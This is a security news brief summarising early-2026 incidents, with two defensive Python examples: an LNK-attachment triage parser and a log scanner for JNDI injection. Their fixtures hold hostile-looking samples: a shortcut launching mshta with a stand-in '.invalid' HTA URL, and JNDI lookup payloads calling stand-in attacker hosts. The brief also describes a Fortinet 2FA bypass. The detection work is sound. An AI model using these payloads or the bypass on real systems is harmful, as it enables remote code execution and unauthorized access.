Svoboda Cybersecurity Brief January 03, 2026
Kimwolf Botnet Exploits Proxy Networks to Infect Local Devices
The Kimwolf botnet has infected over 2 million devices globally, primarily Android TV boxes and digital photo frames, by routing through residential proxy networks such as IPIDEA into the home networks where those devices sit. Once inside, the malware abuses Android Debug Bridge (ADB) over the network, which ships enabled by default on many of these low-cost devices and accepts unauthenticated remote commands. The botnet conducts DDoS attacks, ad fraud, and data exfiltration.
Impact: Mass device compromise, network infiltration, and abuse of trusted proxy services.
Mitigation: Disable network ADB on Android devices, avoid unofficial TV boxes, and scan internal networks for devices exposing ADB (TCP port 5555) and for other suspicious activity.
Source: KrebsOnSecurity
LastPass Breach Linked to $35M Cryptocurrency Theft
Ongoing cryptocurrency thefts totaling $35 million have been traced to the 2022 LastPass breach, where attackers stole encrypted password vaults. Weak master passwords allowed offline cracking, with funds laundered via Wasabi Wallet’s CoinJoin and Russian exchanges. The thefts occurred in waves over years.
Impact: Compromised wallets and financial losses; the vaults stolen in 2022 remain crackable offline, so the threat persists years after the breach.
Mitigation: Rotate every credential stored in a vault that was protected by a weak master password, migrate crypto assets to wallets with freshly generated seeds, and monitor for unauthorized transactions.
Source: BleepingComputer
Transparent Tribe Targets Indian Entities with New RAT
APT36 (Transparent Tribe) deployed a new remote access trojan (RAT) via phishing emails carrying weaponized LNK shortcut files that masquerade as PDFs. The malware chooses its persistence method based on which AV product is installed and exfiltrates data to its C2 servers. Targets include Indian government and academic organizations.
Impact: Persistent access, data theft, and espionage.
Mitigation: Block LNK files in emails, enforce endpoint AV, and monitor for unusual HTA script execution.
Source: TheHackerNews
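Blocking LNK attachments outright is the safest control; where mail must still be inspected, the shortcut can be triaged by its own structure. The Python below is an added example, not code from the brief or from the Transparent Tribe analysis: it parses the Shell Link header and StringData per MS-SHLLINK, then flags the traits of a decoy shortcut (a document-like name, a minimized window, a script host as target). The sample LNK bytes are constructed with the helper at the bottom, not taken from a real campaign.

```python
import re
import struct

LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # 00021401-0000-0000-C000-000000000046

# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST = 1 << 0
HAS_LINK_INFO = 1 << 1
HAS_NAME = 1 << 2
HAS_RELATIVE_PATH = 1 << 3
HAS_WORKING_DIR = 1 << 4
HAS_ARGUMENTS = 1 << 5
HAS_ICON_LOCATION = 1 << 6
IS_UNICODE = 1 << 7
SW_SHOWMINNOACTIVE = 7   # window starts minimized; common in malicious shortcuts

DECOY_NAME_RE = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|txt|jpe?g|png)\.lnk$", re.I)
SCRIPT_HOST_RE = re.compile(r"\b(mshta|powershell|pwsh|cmd|wscript|cscript|rundll32|regsvr32)(\.exe)?\b", re.I)


def parse_lnk(data):
    """Return header fields and StringData of a .lnk, or None if not a Shell Link."""
    if len(data) < LNK_HEADER_SIZE:
        return None
    if struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE or data[4:20] != LNK_CLSID:
        return None
    flags = struct.unpack_from("<I", data, 0x14)[0]
    show_command = struct.unpack_from("<I", data, 0x3C)[0]
    pos = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize (2 bytes) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {"flags": flags, "show_command": show_command}
    # StringData entries appear in this fixed order, each only if its flag is set.
    for name, bit in (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                      ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                      ("icon_location", HAS_ICON_LOCATION)):
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode("utf-16-le", "replace")
            pos += 2 * count
        else:
            fields[name] = data[pos:pos + count].decode("latin-1")
            pos += count
    return fields


def assess(filename, data):
    """List triage findings for an attachment; empty list means 'not a LNK'."""
    lnk = parse_lnk(data)
    if lnk is None:
        return []
    findings = ["is-lnk"]
    if not filename.lower().endswith(".lnk") or DECOY_NAME_RE.search(filename):
        findings.append("decoy-document-name")
    if lnk["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("hidden-window")
    target = lnk.get("relative_path", "") + " " + lnk.get("arguments", "")
    if SCRIPT_HOST_RE.search(target):
        findings.append("script-host-target")
    return findings


def _build_sample_lnk(relative_path, arguments, show_command):
    """Construct a minimal Unicode LNK (test fixture only, not a real sample)."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID + struct.pack("<I", flags)
    header += b"\x00" * (0x3C - len(header)) + struct.pack("<I", show_command)
    header += b"\x00" * (LNK_HEADER_SIZE - len(header))
    body = b""
    for s in (relative_path, arguments):
        body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + body


SAMPLE_NAME = "Invoice_2026.pdf.lnk"   # hypothetical attachment name
SAMPLE_LNK = _build_sample_lnk(r"..\..\Windows\System32\mshta.exe",
                               "http://phish.invalid/invoice.hta", SW_SHOWMINNOACTIVE)

if __name__ == "__main__":
    print(parse_lnk(SAMPLE_LNK))
    print(assess(SAMPLE_NAME, SAMPLE_LNK))
```

The relative path and arguments recovered here are also what to hunt for in endpoint telemetry: a shortcut whose target is mshta, PowerShell or a script host, launched minimized from a mail client's temp directory, matches the HTA execution this item's mitigation asks you to monitor.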
Covenant Health Breach Exposes 478K Patients to Qilin Ransomware
Covenant Health revised its breach count to 478,188 individuals after the Qilin ransomware group stole 852 GB of data, including SSNs and medical records. The attack occurred in May 2025, and the data was leaked after ransom negotiations failed.
Impact: Sensitive health data exposure, identity theft risks.
Mitigation: Offer identity protection services to affected patients, validate breach scope with an independent forensic review, and segment critical healthcare systems.
Source: SecurityWeek
RondoDox Botnet Exploits React2Shell in Next.js Servers
The RondoDox botnet targets CVE-2025-55182 (React2Shell) in servers running Next.js with React Server Components, deploying Mirai variants and cryptocurrency miners. The operators use Linux payloads and stolen credentials to move laterally after the initial compromise.
Impact: Server compromise, botnet enrollment, and resource abuse.
Mitigation: Patch React/Next.js, disable unused RSC endpoints, and monitor for suspicious outbound connections.
Source: SecurityWeek
Google Cloud Phishing Campaign Abuses Legitimate Email Service
Attackers sent 9,394 phishing emails from noreply-application-integration@google[.]com by abusing Google Cloud's Application Integration service. The emails mimic voicemail alerts and redirect through trusted Google domains to fake Microsoft login pages.
Impact: Credential theft; because the messages originate from Google's own infrastructure they pass SPF, DKIM and DMARC, so sender authentication alone will not catch them.
Mitigation: Train users to scrutinize unexpected Google notifications, enforce MFA, and monitor cloud service usage.
Source: TheHackerNews
Adobe ColdFusion Servers Targeted in Mass Exploitation Campaign
A campaign over the 2025 Christmas period exploited 11 ColdFusion vulnerabilities disclosed in 2023–2024, using JNDI/LDAP injection for initial access. Over 6,000 requests targeted servers in the US and Spain.
Impact: Server compromise, potential ransomware deployment.
Mitigation: Patch ColdFusion, restrict JNDI/LDAP endpoints, and monitor for unusual callback traffic.
Source: SecurityWeek
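JNDI injection only pays off for the attacker when the server reaches back out to an LDAP or RMI listener they control, so the request log and the egress log together tell the story. The Python below is an added example, not code from the brief or from the SecurityWeek report: it reads web-server access-log lines in Apache combined format, URL-decodes the request path repeatedly (attackers double-encode to slip past naive filters), and extracts the callback host from any `jndi:` lookup so it can be pivoted into DNS and firewall logs. The log lines are constructed for the offline test; addresses and hostnames in them are documentation ranges and `.invalid` names, not real indicators.

```python
import re
from urllib.parse import unquote

# Apache/Tomcat combined-format access log: ip ident user [ts] "METHOD path proto" status ...
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Any JNDI lookup that names a remote resolver; the host is the attacker's callback.
JNDI_RE = re.compile(r'jndi:(?P<scheme>ldaps?|rmi|dns|iiop)://(?P<host>[^/\s\]}"]+)', re.I)


def deep_unquote(value, rounds=3):
    """Percent-decode until stable (bounded) to defeat double/triple encoding."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_jndi_callbacks(lines):
    """Return one record per request carrying a JNDI lookup, with its callback host."""
    hits = []
    for line in lines:
        m = ACCESS_RE.match(line)
        if not m:
            continue   # unparseable line; a real pipeline would count these
        path = deep_unquote(m["path"])
        j = JNDI_RE.search(path)
        if not j:
            continue
        hits.append({
            "ts": m["ts"],
            "src": m["ip"],
            "path": path.split("?", 1)[0],
            "status": int(m["status"]),
            "scheme": j["scheme"].lower(),
            "callback": j["host"],   # pivot this into DNS/egress logs
        })
    return hits


# Constructed sample log (not from any real incident). Line 2 is single-encoded,
# line 3 double-encoded, lines 1 and 4 are benign (line 4 mentions LDAP innocently).
SAMPLE_LOG = [
    '198.51.100.9 - - [25/Dec/2025:03:10:01 +0000] "GET /index.cfm?page=about HTTP/1.1" 200 4821 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [25/Dec/2025:03:14:07 +0000] "GET /index.cfm?x=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.23%3A1389%2Fa%7D HTTP/1.1" 500 231 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [25/Dec/2025:03:14:09 +0000] "POST /cfusion/index.cfm?page=%2524%257Bjndi%253Aldap%253A%252F%252Fevil.invalid%252Fx%257D HTTP/1.1" 500 231 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [25/Dec/2025:03:15:44 +0000] "GET /docs/ldap-setup.cfm HTTP/1.1" 200 1902 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_jndi_callbacks(SAMPLE_LOG):
        print(hit)
```

A 500 response does not mean the attempt failed; the callback host is the thing to check. Any outbound connection or DNS query from the ColdFusion host to that address around the request timestamp confirms the lookup fired, and the JNDI class loading that follows is the "unusual callback traffic" this item's mitigation refers to.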
Cybersecurity Professionals Plead Guilty in BlackCat Ransomware Scheme
Two US cybersecurity professionals who worked as ransomware negotiators pleaded guilty to conducting BlackCat ransomware attacks themselves, extorting $1.2 million. The DOJ noted that BlackCat has claimed over 1,000 victims.
Impact: Insider threats, reputational damage to security firms.
Source: SecurityWeek
ManageMyHealth Breach Exposes 108K NZ Patient Records
A breach at New Zealand's ManageMyHealth patient portal potentially affected 108,000–126,000 users, with the attacker abusing clinicians' access to medical records.
Impact: Unauthorized access to sensitive health data.
Mitigation: Notify affected users, audit access logs, and enforce stricter authentication.
Source: DataBreaches.net
NIST Releases Draft AI Cybersecurity Framework
NIST published a preliminary Cybersecurity Framework Profile for AI that maps secure AI deployment and defenses against adversarial attacks onto the functions of CSF 2.0.
Source: DataBreaches.net
European Space Agency Confirms Server Breach
ESA confirmed a breach of external servers storing unclassified engineering data after a threat actor posted claims on BreachForums.
Impact: Potential intellectual property theft.
Mitigation: Isolate affected systems, review collaborative project access.
Source: DataBreaches.net
Trust Wallet Hack Tied to Shai-Hulud NPM Attack
An $8.5 million theft from users of Trust Wallet's Chrome extension was linked to the Shai-Hulud npm supply-chain attack, which leaked developer secrets that were then used to push a malicious extension build.
Impact: Compromised wallet data, fraudulent transactions.
Mitigation: Revoke and rotate developer API keys and publishing tokens, pin and review extension updates, and move funds out of wallets that were unlocked while the compromised version was installed.
Source: BleepingComputer
Fortinet Firewalls Vulnerable to 5-Year-Old 2FA Bypass
Over 10,000 Fortinet firewalls remain exposed to CVE-2020-12812, a FortiOS SSL VPN flaw that lets a user skip the second authentication factor by changing the case of their username when LDAP is the backend. Shadowserver tracks ongoing exploitation.
Impact: Unauthorized VPN and admin access, ransomware risk.
Mitigation: Patch FortiOS, or apply Fortinet's username case-sensitivity workaround from the original advisory on the affected user configuration.
Source: BleepingComputer
Share this brief: https://svo.bz/GSMg